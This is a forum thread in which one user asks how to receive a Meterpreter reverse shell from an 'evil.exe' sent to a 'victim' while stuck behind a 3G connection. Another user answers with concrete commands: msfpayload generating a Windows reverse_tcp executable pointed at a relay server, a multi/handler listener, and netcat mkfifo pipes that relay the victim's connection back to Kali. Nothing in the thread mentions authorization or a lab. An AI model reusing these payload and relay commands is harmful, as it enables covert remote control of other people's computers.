Darkrising Posted June 3, 2014 Share Posted June 3, 2014 Hello, I have a 3G connection which I'm unable to open ports for so I'm using a remote server which is accessible from the internet. I'm using Kali on my local computer and Ubuntu for the server. Using the command: ssh -R *:44444:localhost:44444 root@<the remote server> and setting GatewayPorts clientspecified in the sshd config I've port forwarded port 44444 to my local Kali machine. I then setup a reverse tcp handler running on 44444 with LHOST as 127.0.0.1 Lastly I made an evil.exe and sent and ran it on the victim machine. However when I look at Kali I see [*] Sending stage (770048 bytes) to 127.0.0.1 But no meterpreter shell is run. Am I doing something wrong? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 3, 2014 Share Posted June 3, 2014 do u have access to netcat? Ruby python perl ? u should check out mkfifo pips I can help with answer to my above question Quote Link to comment Share on other sites More sharing options...
Darkrising Posted June 4, 2014 Author Share Posted June 4, 2014 do u have access to netcat? Ruby python perl ? u should check out mkfifo pips I can help with answer to my above question Yes, I do have access to them all Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 (edited) $ mkfifo mypipe $ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082 this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request. If this is simple enough we can move on to a reverse_proxy Edited June 4, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
Darkrising Posted June 4, 2014 Author Share Posted June 4, 2014 (edited) $ mkfifo mypipe $ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082 this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request. If this is simple enough we can move on to a reverse_proxy I understand, I've played with netcat before, should I be using netcat to proxy over the ssh tunnel? Edit: I've been looking at what this person has done here: https://bechtsoudis.com/hacking/using-ssh-socks-proxies-with-msf-reverse-tcp-payloads/ However my kali just freezes on sending stage... Edited June 4, 2014 by Darkrising Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 (edited) try another payload. Without the stage. there are 3 machines involved with your project? Kali--->SSH-BOX<---victim? ? Your ssh-box is the only machine that can port forward? I suggest running small test. With netcat you can perform hi world examples Also. The link u provide, scrole down and u will see a netcat example like mine... Edited June 4, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
Darkrising Posted June 4, 2014 Author Share Posted June 4, 2014 try another payload. Without the stage. there are 3 machines involved with your project? Kali--->SSH-BOX<---victim? ? Your ssh-box is the only machine that can port forward? I suggest running small test. With netcat you can perform hi world examples Yeh, that's correct, Kali is behind a gateway which can't have any ports opened so the ssh box is the only machine which can port forward, the victim would connect through the ssh box which would port forward over ssh to the kali box. I have run a few netcat tests which work correctly. It seems metasploit on kali just locks up when a victim connects on sending stage, if I try interact with the session metasploit just locks up completely. I have also tried a reverse_http but it just times out before meterpreter can open. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 also, the link u provide there is a update at the bottem of the page. A netcat example like the one I provide... If your machines are talking to each other then it may just be a metasploit issue Quote Link to comment Share on other sites More sharing options...
Darkrising Posted June 4, 2014 Author Share Posted June 4, 2014 I just tried making a new evil.exe and this time when I try interact with the sessions I'm getting the error: Session manipulation failed: Validation failed: Address is reserved I Googled the error and came across this page: https://community.rapid7.com/thread/2046 It seems metasploit just doesn't like being tunnelled. I have tried the VPN idea using pptpd but I ran into issues with ARP not being on the right subnet. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest! Try something generic reverse shell... no staging or anything Quote Link to comment Share on other sites More sharing options...
Darkrising Posted June 4, 2014 Author Share Posted June 4, 2014 (edited) http:// youtu.be/UkRpOlGS4ew I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest! Try something generic reverse shell... no staging or anything Okay, sounds like a plan, I'll try experimenting with different tunnels and see what I can come up with :) Edited June 4, 2014 by Darkrising Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 (edited) so. If this makes sense... what remember doing... on a droid at the moment... To bypass the problem u experience with metasploit. I had to setup a proxy on the kali localhost that you would set LHOST/PORT to your multi/handler to localhost Kali Msfpayload reverse/payload set LPORT=1234 LHOST=ssh-box -x test.exe Use multihandler Set LHOST localhost Set LPORT 4444 now start a netcat proxy with mkfifo to pass the payload to your ssh-box(impropersyntax) Nc -l -p 4444 0< pipe | nc ssh-box 5555 1> pipe Exploit Now your ssh-box needs to accept this and pass it to the victim, notice 2 ports need forward Ssh-box Nc -l -p 5555 0< pipe | nc -l -p 1234 1> pipe Now your victem executes the exe that connects back to ssh-box:1234... its a brain twister of ports and pipes. Wish i was at my puter for a proper example. Edited June 4, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 4, 2014 Share Posted June 4, 2014 Ok, im at my machine, this should work... kali_local-ip=192.168.70.103 ssh-box_ip=66.66.66.66 #public-ip port 666 and 555 need to be farword on your ssh-box ssh-box mkfifo ssh-box nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box kali from kali, generate payload and set up handler... transfer your payload to the victim... start some nc pipes msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E #new terminal mkfifo kali nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali Now victim execute test.exe will connect back to ssh on port 666 Quote Link to comment Share on other sites More sharing options...
Darkrising Posted September 7, 2014 Author Share Posted September 7, 2014 (edited) -Snip- Hello, It's been a while since I've been messing with this stuff. I tried out your commands and got it to work over my lan, however when I try over the internet it fails. When you say forward is that local or remote with ssh? or do I have to do something else. Also would you be able to explain the nc commads? My understanding of netcat is a little limited. specifically 0<kali 1>kali moving in and out of the pipe I guess? Thanks Edit: I can't get this to work at all over the internet. Edited September 8, 2014 by Darkrising Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.